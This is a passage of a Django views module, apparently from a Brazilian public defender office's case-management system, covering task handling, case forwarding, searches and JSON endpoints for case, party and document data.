excluído!'\r\n success = True\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': success, 'mensagem': mensagem})\r\n else:\r\n if success:\r\n messages.success(request, mensagem)\r\n else:\r\n messages.error(request, mensagem)\r\n return redirect(request.META.get('HTTP_REFERER', '/'))\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_tarefa')\r\ndef excluir_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n\r\n try:\r\n tarefa = Tarefa.objects.get(id=dados['id'], ativo=True, finalizado=None)\r\n tarefa.excluir(excluido_por=request.user.servidor)\r\n except Exception:\r\n success = False\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.change_tarefa')\r\ndef finalizar_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n success = True\r\n dados = simplejson.loads(request.body)\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=dados['id'], ativo=True, finalizado=None)\r\n tarefa.finalizar(request.user.servidor)\r\n\r\n if tarefa.tarefa_oficio:\r\n atendimento = tarefa.atendimento\r\n AtendimentoDefensor.objects.create(\r\n origem=atendimento,\r\n inicial=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n 
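# Os campos abaixo tipificam o novo registro como ofício finalizado,\r\n                    # reaproveitando o ofício e os detalhes do atendimento de origem.\r\n                    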
data_atendimento=datetime.now(),\r\n tipo=AtendimentoDefensor.TIPO_OFICIO_FINALIZADO,\r\n oficio=atendimento.oficio,\r\n detalhes=atendimento.detalhes\r\n )\r\n\r\n except ObjectDoesNotExist:\r\n\r\n success = False\r\n\r\n return JsonResponse({'success': success, 'atendimento': atendimento_numero, 'id': dados['id']})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\ndef remeter_atendimento(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n try:\r\n agora = timezone.now()\r\n servidor = request.user.servidor\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n setor_responsavel = Defensoria.objects.get(id=dados['defensoria_destino_id'])\r\n\r\n # Cria anotação\r\n AtendimentoDefensor.objects.create(\r\n tipo=AtendimentoDefensor.TIPO_ANOTACAO,\r\n data_agendamento=agora,\r\n data_atendimento=agora,\r\n cadastrado_por=servidor,\r\n agendado_por=servidor,\r\n atendido_por=servidor,\r\n inicial_id=dados['atendimento_id'],\r\n origem_id=dados['atendimento_id'],\r\n defensor_id=dados['defensor_destino_id'],\r\n defensoria_id=dados['defensoria_destino_id'],\r\n qualificacao_id=dados['qualificacao_id'],\r\n historico=dados['historico'],\r\n )\r\n\r\n # cria cooperação com o remetimento\r\n Tarefa.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n resposta_para=setor_responsavel,\r\n setor_responsavel=atendimento.defensoria,\r\n titulo='REMETIMENTO DE ATENDIMENTO',\r\n descricao=\"Cooperação gerada automaticamente após atendimento ser remetido de \" + atendimento.defensoria.nome + \" para \" + setor_responsavel.nome, # noqa: E501\r\n data_inicial=date.today(),\r\n data_final=None,\r\n prioridade=Tarefa.PRIORIDADE_COOPERACAO,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n except Exception:\r\n success = False\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\nclass BuscarTarefas(ListView):\r\n queryset = Tarefa.objects.select_related(\r\n 'atendimento__defensor__defensoria',\r\n 'setor_responsavel',\r\n 'responsavel__usuario',\r\n 'cadastrado_por__usuario',\r\n ).annotate(\r\n respondido_por=F('all_respostas__finalizado__nome'),\r\n respondido_por_username=F('all_respostas__finalizado__usuario__username'),\r\n ).filter(\r\n (\r\n Q(origem=None) &\r\n Q(atendimento__ativo=True) &\r\n ~Q(\r\n Q(titulo='Solicitação de Apoio Respondida') &\r\n Q(responsavel=None) &\r\n Q(data_inicial=None) &\r\n Q(data_final=None)\r\n )\r\n ) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n ) &\r\n (\r\n Q(all_respostas=None) |\r\n (\r\n ~Q(all_respostas__finalizado=None) &\r\n Q(all_respostas__ativo=True)\r\n )\r\n )\r\n ).order_by(\r\n 'data_inicial', 'prioridade', 'data_final', 'id', '-all_respostas__id'\r\n ).distinct(\r\n 'data_inicial', 'prioridade', 'data_final', 'id'\r\n )\r\n model = Tarefa\r\n paginate_by = 50\r\n template_name = \"atendimento/tarefa/buscar.html\"\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(BuscarTarefas, self).get_context_data(**kwargs)\r\n\r\n context.update({\r\n 'form': self.get_form(),\r\n 'ordering': 
swap_ordenacao_tarefas(self.request.GET.get('ordering', 'data_final'))\r\n })\r\n\r\n return context\r\n\r\n def get_queryset(self):\r\n\r\n queryset = super(BuscarTarefas, self).get_queryset()\r\n q = Q()\r\n\r\n # Obtém lista de defensorias do usuário\r\n defensorias = set(self.request.user.servidor.defensor.defensorias.values_list('id', flat=True))\r\n\r\n # Configuração para exibir ou não as cooperações cumpridas\r\n if not config.EXIBIR_COOPERACOES_CUMPRIDAS_PARA_RESPONSAVEL:\r\n q &= ~Q(\r\n Q(prioridade=Tarefa.PRIORIDADE_COOPERACAO) &\r\n Q(status=Tarefa.STATUS_CUMPRIDO) &\r\n Q(setor_responsavel__in=defensorias)\r\n )\r\n\r\n # Se usuário não tem permissão para ver todos atendimentos, restringe informações de acordo com suas lotações\r\n if not self.request.user.has_perm(perm='atendimento.view_all_atendimentos'):\r\n q &= Q(setor_responsavel__in=defensorias)\r\n\r\n tarefas_propac = get_tarefas_propac()\r\n\r\n form = self.get_form()\r\n\r\n # Só filtra se valores de busca forem válidos\r\n if form.is_valid():\r\n\r\n data = form.cleaned_data\r\n\r\n filtros_tarefas = filtra_tarefas(data)\r\n q &= filtros_tarefas\r\n\r\n tarefas_propac = tarefas_propac.filter(filtros_tarefas)\r\n\r\n queryset = queryset.filter(q)\r\n\r\n if tarefas_propac:\r\n queryset = queryset | tarefas_propac\r\n queryset = queryset.order_by('data_inicial', 'prioridade', 'data_final', 'id')\r\n\r\n return queryset\r\n\r\n def get_ordering(self):\r\n return self.request.GET.get('ordering', 'data_final')\r\n\r\n def get_form(self):\r\n\r\n form_initial = self.request.GET.copy()\r\n\r\n if config.PRE_FILTRAR_TAREFAS_USUARIO_LOGADO and 'responsavel' not in form_initial and self.request.user.servidor.defensor: # noqa: E501\r\n form_initial['responsavel'] = self.request.user.servidor.defensor.id\r\n\r\n return BuscarTarefaForm(form_initial, usuario=self.request.user)\r\n\r\n\r\nclass FinalizarTarefas(View):\r\n def post(self, request, *args, **kwargs):\r\n\r\n # obtém lista de tarefas marcadas\r\n tarefas = Tarefa.objects.filter(\r\n id__in=request.POST.getlist('id')\r\n )\r\n\r\n agora = timezone.now()\r\n tarefas_finalizadas = 0\r\n tarefas_nao_finalizadas = 0\r\n\r\n # passa em cada registro, verificando permissão para finaliza\r\n for tarefa in tarefas:\r\n if tarefa.pode_finalizar(request.user):\r\n tarefa.finalizar(\r\n servidor=request.user.servidor,\r\n data_finalizado=agora\r\n )\r\n tarefas_finalizadas += 1\r\n else:\r\n tarefas_nao_finalizadas += 1\r\n\r\n if tarefas_finalizadas:\r\n messages.success(request, '{} tarefas foram finalizadas!'.format(\r\n tarefas_finalizadas\r\n ))\r\n\r\n if tarefas_nao_finalizadas:\r\n messages.error(request, '{} tarefas não puderam ser finalizadas!'.format(\r\n tarefas_nao_finalizadas\r\n ))\r\n\r\n return HttpResponseRedirect(self.request.META.get('HTTP_REFERER', '/'))\r\n\r\n\r\n@login_required\r\ndef visualizar_tarefa(request, tarefa_id):\r\n\r\n success = True\r\n message = None\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=tarefa_id, ativo=True)\r\n\r\n if request.user.is_superuser and not config.REGISTRAR_VISUALIZACAO_TAREFA_SUPERUSUARIO:\r\n message = 'Visualização não registrada (superusuário)'\r\n elif tarefa.cadastrado_por and tarefa.cadastrado_por.usuario_id == request.user.id:\r\n message = 'Visualização não registrada (cadastrante)'\r\n else:\r\n TarefaVisualizacao.objects.get_or_create(\r\n tarefa=tarefa,\r\n visualizada_por=request.user.servidor\r\n )\r\n message = 'Visualização registrada'\r\n\r\n except ObjectDoesNotExist:\r\n message = 'Tarefa não 
existe'\r\n success = False\r\n\r\n return JsonResponse({\r\n 'id': tarefa_id,\r\n 'success': success,\r\n 'message': message\r\n })\r\n\r\n\r\n@login_required\r\ndef get_tarefa(request, tarefa_id):\r\n\r\n resposta = {}\r\n\r\n try:\r\n\r\n tarefa = Tarefa.objects.get(id=tarefa_id, ativo=True)\r\n resposta = Util.object_to_dict(tarefa, {})\r\n\r\n resposta['visualizacoes'] = []\r\n visualizacoes = tarefa.visualizacoes.all().values('visualizada_em', 'visualizada_por__nome')\r\n\r\n for v in visualizacoes:\r\n resposta['visualizacoes'].append({\r\n 'visualizada_em': v['visualizada_em'].strftime('%Y-%m-%dT%H:%M:%S-03:00'),\r\n 'visualizada_por': v['visualizada_por__nome']\r\n })\r\n\r\n except ObjectDoesNotExist:\r\n pass\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json(request, atendimento_numero):\r\n\r\n a = get_object_or_404(\r\n AtendimentoDefensor.objects.select_related(\r\n 'qualificacao__area',\r\n 'qualificacao__especializado',\r\n 'comarca',\r\n 'defensoria',\r\n 'defensor__servidor',\r\n 'substituto__servidor',\r\n 'nucleo',\r\n 'modificado_por',\r\n 'agendado_por',\r\n 'atendido_por',\r\n 'tipo_motivo_exclusao'\r\n ),\r\n numero=atendimento_numero\r\n )\r\n\r\n requerente = None\r\n requentes = []\r\n\r\n requerido_nome = None\r\n requeridos = []\r\n\r\n for pessoa in a.pessoas.values('pessoa_id', 'pessoa__nome', 'responsavel', 'tipo'):\r\n\r\n assistido = {\r\n 'id': pessoa['pessoa_id'],\r\n 'nome': pessoa['pessoa__nome']\r\n }\r\n\r\n if pessoa['tipo'] == AtendimentoPessoa.TIPO_REQUERENTE:\r\n if pessoa['responsavel']:\r\n requerente = assistido\r\n requentes.append(assistido)\r\n else:\r\n if pessoa['responsavel']:\r\n requerido_nome = assistido['nome']\r\n requeridos.append(assistido)\r\n\r\n resposta = {\r\n 'id': a.id,\r\n 'numero': a.numero,\r\n 'tipo': a.LISTA_TIPO[a.tipo][1],\r\n 'tipo_id': a.tipo,\r\n 'requerente': requerente['nome'] if requerente else None,\r\n 'requerentes': requentes,\r\n 'requerido': requerido_nome,\r\n 'requeridos': requeridos,\r\n 'area': a.qualificacao.area.nome if a.qualificacao else None,\r\n 'pedido': a.qualificacao.titulo if a.qualificacao else None,\r\n 'nucleo': a.nucleo.nome if a.nucleo else None,\r\n 'especializado': a.qualificacao.especializado.nome if a.qualificacao and a.qualificacao.especializado else None,\r\n 'horario': a.data_agendamento.time().strftime('%H:%M') if a.data_agendamento else None,\r\n 'horario_atendimento': a.data_atendimento.time().strftime('%H:%M') if a.data_atendimento else None,\r\n 'atrasado': a.atrasado,\r\n 'historico_recepcao': 1 if a.recepcao else 0,\r\n 'historico_atendimento': 1 if a.historico else 0,\r\n 'comarca': a.comarca.nome if a.comarca else None,\r\n 'defensoria': a.defensoria.nome if a.defensoria else None,\r\n 'defensor': a.defensor.nome if a.defensor else None,\r\n 'substituto': a.substituto.nome if a.substituto else None,\r\n 'id_comarca': a.comarca.id if a.comarca else None,\r\n 'guiche': 0,\r\n 'agendado_por': a.agendado_por.nome if a.agendado_por else None,\r\n 'data_agendado': a.data_cadastro.strftime('%Y-%m-%dT%H:%M:00-03:00'),\r\n 'cadastrado_por': a.recepcao.atendido_por.nome if a.recepcao else None,\r\n 'data_cadastro': a.recepcao.data_atendimento.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.recepcao else None,\r\n 'modificado_por': a.modificado_por.nome if a.modificado_por else None,\r\n 'data_modificacao': a.data_modificacao.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.data_modificacao else None,\r\n 'atendido_por': a.atendido_por.nome if 
a.atendido_por else None,\r\n 'data_atendimento': a.data_atendimento.strftime('%Y-%m-%dT%H:%M:00-03:00') if a.data_atendimento else None,\r\n 'agenda': a.agenda.nome,\r\n 'extra': a.extra,\r\n 'remarcado': a.qtd_remarcado,\r\n 'telefones': Util.json_serialize(Telefone.objects.filter(pessoa=requerente['id']) if requerente else []),\r\n 'pode_excluir': a.pode_excluir(usuario=request.user),\r\n 'motivo_exclusao': a.motivo_exclusao,\r\n 'motivo_exclusao_nome': a.tipo_motivo_exclusao.nome if a.tipo_motivo_exclusao else None,\r\n 'motivos_exclusao': list(MotivoExclusao.objects.ativos().values('id', 'nome'))\r\n }\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_permissao_atendimento_botoes(request, atendimento_numero):\r\n \"\"\"Utilizado para o tratamento de renderização dos botões das ações da Ficha de Atendimento.\r\n Botão de anotação, apoio operacional e agendar.\r\n \"\"\"\r\n\r\n sucesso = True\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n\r\n pode_agendar = False\r\n pode_solicitar_apoio = False\r\n pode_cadastrar_anotacao = False\r\n pode_cadastrar_visita_ao_preso = False\r\n\r\n retorno_pendente = False\r\n\r\n if atendimento:\r\n\r\n if (verifica_permissao_editar(request.user, atendimento) or\r\n atendimento.permissao_acessar(usuario=request.user) or\r\n atendimento.acesso_concedido(defensor=request.user.servidor.defensor)):\r\n\r\n if atendimento.realizado:\r\n\r\n # não tem retorno pendente\r\n if not atendimento.retornos_pendentes:\r\n pode_agendar = True\r\n else:\r\n retorno_pendente = True\r\n\r\n if not atendimento.tipo == atendimento.TIPO_NUCLEO:\r\n pode_solicitar_apoio = True\r\n\r\n if atendimento.realizado or config.REGISTRAR_ANOTACAO_EM_AGENDAMENTO:\r\n pode_cadastrar_anotacao = True\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(\r\n pessoa=atendimento.requerente.pessoa,\r\n ativo=True\r\n ).exists()\r\n\r\n if prisoes:\r\n pode_cadastrar_visita_ao_preso = True\r\n\r\n else:\r\n sucesso = False\r\n\r\n permissao_botoes_acoes = {\r\n 'retorno_pendente': retorno_pendente,\r\n 'pode_agendar': pode_agendar,\r\n 'pode_solicitar_apoio': pode_solicitar_apoio,\r\n 'pode_cadastrar_anotacao': pode_cadastrar_anotacao,\r\n 'pode_cadastrar_visita_ao_preso': pode_cadastrar_visita_ao_preso\r\n }\r\n\r\n return JsonResponse({\r\n 'sucesso': sucesso,\r\n 'permissao_botoes': permissao_botoes_acoes\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_pessoas(request, atendimento_numero, tipo):\r\n \"\"\"Utilizado para buscar Requerentes e Requeridos via json\"\"\"\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n if atendimento:\r\n\r\n pessoas_dict = []\r\n interessado = None\r\n eh_requerente = True\r\n\r\n if int(tipo) == AtendimentoPessoa.TIPO_REQUERENTE:\r\n pessoas = atendimento.get_requerentes()\r\n tipo = 'requerentes'\r\n\r\n if hasattr(atendimento, 'atendimento'):\r\n interessado = atendimento.atendimento.interessado_id\r\n\r\n else:\r\n pessoas = atendimento.get_requeridos()\r\n tipo = 'requeridos'\r\n eh_requerente = False\r\n\r\n for pessoa in pessoas:\r\n filiacao = []\r\n\r\n for f in pessoa.pessoa.filiacoes.all():\r\n filiacao.append({'nome': f.nome})\r\n\r\n # busca a foto da pessoa\r\n from assistido.models import PessoaAssistida\r\n foto = PessoaAssistida.objects.filter(id=pessoa.pessoa.id).first().get_foto()\r\n\r\n # verifica se a pessoa esta presa\r\n from 
nucleo.nadep.models import Aprisionamento\r\n            preso = Aprisionamento.objects.filter(prisao__pessoa=pessoa.pessoa, data_final=None, ativo=True).exists()\r\n\r\n            pessoas_dict.append({\r\n                'pessoa_id': pessoa.pessoa.id,\r\n                'nome': pessoa.pessoa.nome,\r\n                'nome_tratado': pessoa.pessoa.nome_tratado,\r\n                'possui_nome_social': pessoa.pessoa.possui_nome_social(),\r\n                'possui_nome_fantasia': pessoa.pessoa.possui_nome_fantasia(),\r\n                'eh_pessoa_fisica': pessoa.pessoa.eh_pessoa_fisica,\r\n                'cpf': pessoa.pessoa.cpf,\r\n                'data_nascimento': pessoa.pessoa.data_nascimento,\r\n                'idade': pessoa.pessoa.idade,\r\n                'idoso': pessoa.pessoa.idoso,\r\n                'pne': pessoa.pessoa.pne,\r\n                'responsavel': pessoa.responsavel,\r\n                'interessado': pessoa.pessoa.id == interessado,\r\n                'preso': preso,\r\n                'eh_requerente': eh_requerente,\r\n                'eh_requerido': not eh_requerente,\r\n                'filiacao': filiacao,\r\n                'foto': foto\r\n            })\r\n\r\n        return JsonResponse({tipo: pessoas_dict})\r\n\r\n    return JsonResponse({'mensagem': 'Atendimento não encontrado.'})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_json_documentos(request, atendimento_numero):\r\n    \"\"\"Busca os documentos do atendimento\"\"\"\r\n\r\n    # get_object_or_404 evita AttributeError quando o atendimento não existe\r\n    documentos = get_object_or_404(\r\n        AtendimentoDefensor,\r\n        numero=atendimento_numero\r\n    ).documentos.select_related(\r\n        'documento_online',\r\n        'cadastrado_por__usuario',\r\n        'enviado_por__usuario',\r\n    )\r\n\r\n    documentos_list = []\r\n\r\n    for documento in documentos:\r\n        documentos_list.append({\r\n            'id': documento.id,\r\n            'nome': documento.nome,\r\n            'arquivo': documento.arquivo.url if documento.arquivo else '',\r\n            'data_cadastro': documento.data_cadastro,\r\n            'cadastrado_por_nome': documento.cadastrado_por.nome if documento.cadastrado_por else None,\r\n            'cadastrado_por_username': documento.cadastrado_por.usuario.username if documento.cadastrado_por else None,\r\n            'data_enviado': documento.data_enviado,\r\n            'enviado_por_nome': documento.enviado_por.nome if documento.enviado_por else None,\r\n            'enviado_por_username': documento.enviado_por.usuario.username if documento.enviado_por else None,\r\n            'documento_online': {\r\n                'id': documento.documento_online_id,\r\n                'assunto': documento.documento_online.assunto,\r\n                'identificador_versao': documento.documento_online.identificador_versao\r\n            } if documento.documento_online else None,\r\n            'pendente': documento.pendente,\r\n        })\r\n\r\n    return JsonResponse({'documentos': documentos_list})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef get_arvore_json(request, atendimento_numero):\r\n    inicial = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n    if inicial:\r\n\r\n        resposta = {'success': True, 'remarcar': None, 'retornos': [], 'processos': []}\r\n\r\n        retornos = inicial.retornos.values(\r\n            'id',\r\n            'numero',\r\n            'data_cadastro',\r\n            'data_agendamento',\r\n            'data_atendimento',\r\n            'defensor__servidor__nome',\r\n            'defensoria__nome',\r\n            'nucleo__nome',\r\n            'qualificacao__titulo',\r\n            'qualificacao__area__nome',\r\n            'tipo',\r\n            'cadastrado_por__nome',\r\n            'historico_recepcao',\r\n            'historico',\r\n        ).exclude(\r\n            tipo=Atendimento.TIPO_NUCLEO\r\n        ).order_by(\r\n            'data_atendimento', 'data_agendamento'\r\n        )\r\n\r\n        for retorno in retornos:\r\n\r\n            if not retorno['data_atendimento']:\r\n                resposta['remarcar'] = retorno['numero']\r\n\r\n            resposta['retornos'].append({\r\n                'numero': retorno['numero'],\r\n                'data_cadastro': retorno['data_cadastro'],\r\n                'data_agendamento': retorno['data_agendamento'],\r\n                'data_atendimento': retorno['data_atendimento'],\r\n                
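# Renomeia os campos do values() acima para as chaves consumidas pela árvore de retornos\r\n                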
'defensor': retorno['defensor__servidor__nome'],\r\n 'defensoria': retorno['defensoria__nome'],\r\n 'nucleo': retorno['nucleo__nome'],\r\n 'qualificacao': retorno['qualificacao__titulo'],\r\n 'area': retorno['qualificacao__area__nome'],\r\n 'tipo': dict(Atendimento.LISTA_TIPO)[retorno['tipo']],\r\n 'cadastrado_por': retorno['cadastrado_por__nome'],\r\n 'historico_agendamento': retorno['historico_recepcao'],\r\n 'historico_defensor': retorno['historico'],\r\n 'recepcao': None,\r\n 'arquivado': inicial.arquivado,\r\n })\r\n\r\n resposta['retornos'][-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=retorno['id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n processos = inicial.get_processos().values(\r\n 'numero_puro',\r\n 'numero',\r\n 'chave',\r\n 'grau',\r\n 'tipo',\r\n )\r\n\r\n resposta['processos'] = list(processos)\r\n\r\n return JsonResponse(resposta)\r\n\r\n else:\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index(request):\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n raise Http404\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca.id\r\n\r\n nucleo = request.session.get('nucleo')\r\n pode_cadastrar_atividade_extraordinaria = False\r\n\r\n try:\r\n inicio = datetime.strptime(request.POST['data_atendimento'], '%d/%m/%Y')\r\n except KeyError:\r\n inicio = datetime.now()\r\n\r\n atuacoes = Atuacao.objects.filter(defensor=defensor)\r\n\r\n # Se hoje, obtém atuações vigentes\r\n if inicio.date() == date.today():\r\n atuacoes = atuacoes.vigentes(inicio=inicio, ajustar_horario=False)\r\n # Se outro dia, obtém atuações parcialmente vigentes no dia\r\n else:\r\n atuacoes = atuacoes.parcialmente_vigentes(inicio=inicio)\r\n\r\n # Se núcleo, filtra atuações do núcleo, senão, filtra atuações sem núcleo vinculado\r\n if nucleo:\r\n atuacoes = atuacoes.filter(defensoria__nucleo=nucleo)\r\n else:\r\n atuacoes = atuacoes.filter(defensoria__nucleo__isnull=True)\r\n\r\n pode_cadastrar_atividade_extraordinaria = atuacoes.filter(\r\n defensoria__pode_cadastrar_atividade_extraordinaria=True\r\n ).exists()\r\n\r\n ids_defensoria_atuacoes = list(set(atuacoes.values_list('defensoria_id', flat=True)))\r\n processos_cadastrados = ParteProcesso.objects.filter(\r\n (\r\n (\r\n Q(defensoria__in=ids_defensoria_atuacoes) & Q(defensoria__nucleo=nucleo)\r\n ) |\r\n (\r\n Q(defensoria_cadastro__in=ids_defensoria_atuacoes) & Q(defensoria_cadastro__nucleo=nucleo)\r\n )\r\n ) &\r\n Q(ativo=True) &\r\n ~Q(atendimento=None) &\r\n Q(data_cadastro__gte=(datetime.now().date() - timedelta(days=30)))\r\n ).order_by('-data_cadastro')\r\n\r\n processos_movimentados = ParteProcesso.objects.filter(\r\n (\r\n (\r\n Q(defensoria__in=ids_defensoria_atuacoes) & Q(defensoria__nucleo=nucleo)\r\n ) |\r\n (\r\n Q(defensoria_cadastro__in=ids_defensoria_atuacoes) & Q(defensoria_cadastro__nucleo=nucleo)\r\n )\r\n ) &\r\n Q(ativo=True) &\r\n ~Q(atendimento=None) &\r\n Q(processo__ultima_consulta__gte=(datetime.now().date() - timedelta(days=30)))\r\n ).order_by('-processo__ultima_consulta')\r\n\r\n sistemas_webservices_procapi = []\r\n\r\n if config.ATIVAR_PROCAPI:\r\n from procapi_client.services import APISistema\r\n sistemas_webservices_procapi = APISistema().listar_todos()\r\n\r\n return 
render(\r\n request=request,\r\n template_name=\"atendimento/index.html\",\r\n context={\r\n 'usuario': request.user,\r\n 'defensor_id': defensor.id,\r\n 'defensor': defensor,\r\n 'comarca': comarca,\r\n 'nucleo': nucleo,\r\n 'inicio': inicio,\r\n 'ids_defensoria_atuacoes': ids_defensoria_atuacoes,\r\n 'processos_cadastrados': processos_cadastrados,\r\n 'processos_movimentados': processos_movimentados,\r\n 'angular': 'AtendimentoIndexCtrl',\r\n 'pode_cadastrar_atividade_extraordinaria': pode_cadastrar_atividade_extraordinaria,\r\n 'next_excluir': reverse('atendimento_index'),\r\n 'sigla_uf': settings.SIGLA_UF.upper(),\r\n 'ativar_acompanhamento_processo': config.ATIVAR_ACOMPANHAMENTO_PROCESSO,\r\n 'dias_acompanhamento_processo': config.DIAS_ACOMPANHAMENTO_PROCESSO,\r\n 'sistemas_webservices_procapi': sistemas_webservices_procapi\r\n }\r\n )\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get(request):\r\n \"\"\"Utilizado para buscar os atendimentos conforme o dia selecionado no Painel do Defensor\"\"\"\r\n\r\n mensagem = 'Erro ao buscar dados'\r\n sucesso = False\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n # faz leitura de dados do request Ajax e trata a data base\r\n dados = simplejson.loads(request.body)\r\n try:\r\n data_base = datetime.strptime(dados['data'][:10], '%Y-%m-%d').date()\r\n except KeyError:\r\n data_base = date.today()\r\n\r\n defensor = request.user.servidor.defensor\r\n\r\n # busca as atuações do dia selecionado\r\n defensorias = list(defensor.all_atuacoes.parcialmente_vigentes(\r\n inicio=data_base,\r\n termino=data_base\r\n ).values_list('defensoria_id', flat=True))\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca\r\n\r\n nucleo = request.session.get('nucleo')\r\n itinerante = request.user.servidor.proximo_itinerante\r\n\r\n if not defensor.eh_defensor and itinerante and nucleo and nucleo.itinerante:\r\n defensorias = [itinerante.defensoria_id]\r\n\r\n # Se não existir atuação para o dia selecionado não deve nem executar a query\r\n if defensorias:\r\n\r\n # início da criação da query para buscar dados da vw_atendimentos_defensor\r\n data_base_ini = data_base\r\n data_base_fim = datetime.combine(data_base, time.max)\r\n\r\n from atendimento.atendimento.models import ViewAtendimentoDefensor\r\n\r\n query = Q(\r\n Q(defensoria_id__in=defensorias) &\r\n Q(\r\n Q(data_atendimento__range=[data_base_ini, data_base_fim]) |\r\n Q(\r\n Q(data_atendimento=None) &\r\n Q(\r\n Q(data_agendamento__range=[data_base_ini, data_base_fim]) |\r\n Q(tipo=Atendimento.TIPO_NUCLEO)\r\n )\r\n )\r\n )\r\n )\r\n\r\n if nucleo:\r\n query &= Q(nucleo_id=nucleo.id)\r\n\r\n if nucleo.supervisionado and not defensor.eh_defensor:\r\n query &= Q(responsavel_id=defensor.id)\r\n\r\n else:\r\n query &= Q(comarca_id=comarca.id) & Q(nucleo_id=None)\r\n\r\n atendimentos = ViewAtendimentoDefensor.objects.filter(\r\n query\r\n ).order_by(\r\n '-data_atendimento',\r\n '-prioridade',\r\n 'data_atendimento_recepcao',\r\n 'data_agendamento'\r\n )\r\n\r\n # TODO: Usar método da model atendimento.Defensor\r\n # Permite atender sem liberar pela recepção se tiver permissão pra isso\r\n pode_atender_sem_liberar = request.user.has_perm('atendimento.atender_sem_liberar')\r\n pode_atender_retroativo = request.user.has_perm('atendimento.atender_retroativo')\r\n\r\n dados = 
[]\r\n\r\n                # Busca o usuário do chatbot LUNA uma única vez, fora do laço;\r\n                # filter().first() retorna None quando o usuário não existe, sem lançar DoesNotExist\r\n                usuario_luna = None\r\n                if settings.CHATBOT_LUNA_USERNAME:\r\n                    usuario_luna = User.objects.filter(username=settings.CHATBOT_LUNA_USERNAME).first()\r\n\r\n                for a in atendimentos:\r\n\r\n                    if not a.data_atendimento and a.recepcao_id:\r\n                        cron = Cronometro.objects.filter(\r\n                            atendimento_id=a.id,\r\n                            termino__gte=a.data_atendimento_recepcao\r\n                        ).order_by(\r\n                            '-termino'\r\n                        ).first()\r\n                    else:\r\n                        cron = None\r\n\r\n                    # Adiciona verificação se o atendimento é LUNA, visto que os atendimentos LUNA sempre recebem um\r\n                    # Responsável a partir do momento que é distribuído no CRC, quebrando a lógica abaixo.\r\n                    # Tratar um agendamento LUNA com a lógica de distribuído faz com que os liberados não apareçam\r\n                    # devido o filtro presente em atendimento/index_box_atendimentos.html\r\n                    atendimento_online = bool(usuario_luna and usuario_luna.first_name == a.cadastrado_por_nome)\r\n\r\n                    dados.append({\r\n                        'id': a.id,\r\n                        'numero': a.numero,\r\n                        'tipo': Atendimento.LISTA_TIPO[a.tipo][1],\r\n                        'data_agendamento': Util.date_to_json(a.data_agendamento) if a.data_agendamento else None,\r\n                        'data_atendimento': Util.date_to_json(a.data_atendimento) if a.data_atendimento else None,\r\n                        'data_atendimento_recepcao': Util.date_to_json(a.data_atendimento_recepcao) if a.data_atendimento_recepcao else None,  # noqa: E501\r\n                        'requerente': a.requerente_nome,\r\n                        'requerente_nome_social': a.requerente_nome_social,\r\n                        'requerido': a.requerido_nome,\r\n                        'requerido_nome_social': a.requerido_nome_social,\r\n                        'agenda': a.agenda_id,\r\n                        'forma_atendimento': a.forma_atendimento_id,\r\n                        'extra': a.extra,\r\n                        'inicial': a.inicial_numero,\r\n                        'origem': a.origem_tipo,\r\n                        'recepcao': a.recepcao_id or pode_atender_sem_liberar or pode_atender_retroativo,\r\n                        'defensor': a.defensor_nome,\r\n                        'substituto': a.substituto_nome,\r\n                        